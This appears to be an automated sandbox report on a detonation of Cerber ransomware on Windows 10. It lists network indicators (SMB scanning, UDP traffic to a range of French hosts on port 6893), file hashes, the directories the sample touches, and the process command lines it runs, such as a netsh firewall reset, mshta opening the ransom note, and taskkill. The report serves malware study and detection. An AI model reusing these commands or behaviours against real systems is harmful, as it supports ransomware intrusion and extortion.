| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| N/A | 10.127.0.23:445 | tcp | |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/3420-0-0x0000000000E50000-0x0000000000EAE000-memory.dmp
memory/3420-8-0x0000000000E50000-0x0000000000EAE000-memory.dmp
memory/3420-9-0x0000000000E50000-0x0000000000EAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B6EC.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/3420-11-0x0000000000E50000-0x0000000000EAE000-memory.dmp
memory/3420-22-0x0000000000E50000-0x0000000000EAE000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
136s
Command Line
Signatures
Cerber
Cerber family
Contacts a large (1100) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpBB03.bmp" | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\cerber.exe
"C:\Users\Admin\AppData\Local\Temp\cerber.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___YQEYK_.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___UX8T_.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im "cerber.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 1 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FR | 178.33.158.0:6893 | udp | |
| FR | 178.33.158.1:6893 | udp | |
| FR | 178.33.158.2:6893 | udp | |
| FR | 178.33.158.3:6893 | udp | |
| FR | 178.33.158.4:6893 | udp | |
| FR | 178.33.158.5:6893 | udp | |
| FR | 178.33.158.6:6893 | udp | |
| FR | 178.33.158.7:6893 | udp | |
| FR | 178.33.158.8:6893 | udp | |
| FR | 178.33.158.9:6893 | udp | |
| FR | 178.33.158.10:6893 | udp | |
| FR | 178.33.158.11:6893 | udp | |
| FR | 178.33.158.12:6893 | udp | |
| FR | 178.33.158.13:6893 | udp | |
| FR | 178.33.158.14:6893 | udp | |
| FR | 178.33.158.15:6893 | udp | |
| FR | 178.33.158.16:6893 | udp | |
| FR | 178.33.158.17:6893 | udp | |
| FR | 178.33.158.18:6893 | udp | |
| FR | 178.33.158.19:6893 | udp | |
| FR | 178.33.158.20:6893 | udp | |
| FR | 178.33.158.21:6893 | udp | |
| FR | 178.33.158.22:6893 | udp | |
| FR | 178.33.158.23:6893 | udp | |
| FR | 178.33.158.24:6893 | udp | |
| FR | 178.33.158.25:6893 | udp | |
| FR | 178.33.158.26:6893 | udp | |
| FR | 178.33.158.27:6893 | udp | |
| FR | 178.33.158.28:6893 | udp | |
| FR | 178.33.158.29:6893 | udp | |
| FR | 178.33.158.30:6893 | udp | |
| FR | 178.33.158.31:6893 | udp | |
| FR | 178.33.159.0:6893 | udp | |
| FR | 178.33.159.1:6893 | udp | |
| FR | 178.33.159.2:6893 | udp | |
| FR | 178.33.159.3:6893 | udp | |
| FR | 178.33.159.4:6893 | udp | |
| FR | 178.33.159.5:6893 | udp | |
| FR | 178.33.159.6:6893 | udp | |
| FR | 178.33.159.7:6893 | udp | |
| FR | 178.33.159.8:6893 | udp | |
| FR | 178.33.159.9:6893 | udp | |
| FR | 178.33.159.10:6893 | udp | |
| FR | 178.33.159.11:6893 | udp | |
| FR | 178.33.159.12:6893 | udp | |
| FR | 178.33.159.13:6893 | udp | |
| FR | 178.33.159.14:6893 | udp | |
| FR | 178.33.159.15:6893 | udp | |
| FR | 178.33.159.16:6893 | udp | |
| FR | 178.33.159.17:6893 | udp | |
| FR | 178.33.159.18:6893 | udp | |
| FR | 178.33.159.19:6893 | udp | |
| FR | 178.33.159.20:6893 | udp | |
| FR | 178.33.159.21:6893 | udp | |
| FR | 178.33.159.22:6893 | udp | |
| FR | 178.33.159.23:6893 | udp | |
| FR | 178.33.159.24:6893 | udp | |
| FR | 178.33.159.25:6893 | udp | |
| FR | 178.33.159.26:6893 | udp | |
| FR | 178.33.159.27:6893 | udp | |
| FR | 178.33.159.28:6893 | udp | |
| FR | 178.33.159.29:6893 | udp | |
| FR | 178.33.159.30:6893 | udp | |
| FR | 178.33.159.31:6893 | udp | |
| FR | 178.33.160.0:6893 | udp | |
| FR | 178.33.160.1:6893 | udp | |
| FR | 178.33.160.2:6893 | udp | |
| FR | 178.33.160.3:6893 | udp | |
| FR | 178.33.160.4:6893 | udp | |
| FR | 178.33.160.5:6893 | udp | |
| FR | 178.33.160.6:6893 | udp | |
| FR | 178.33.160.7:6893 | udp | |
| FR | 178.33.160.8:6893 | udp | |
| FR | 178.33.160.9:6893 | udp | |
| FR | 178.33.160.10:6893 | udp | |
| FR | 178.33.160.11:6893 | udp | |
| FR | 178.33.160.12:6893 | udp | |
| FR | 178.33.160.13:6893 | udp | |
| FR | 178.33.160.14:6893 | udp | |
| FR | 178.33.160.15:6893 | udp | |
| FR | 178.33.160.16:6893 | udp | |
| FR | 178.33.160.17:6893 | udp | |
| FR | 178.33.160.18:6893 | udp | |
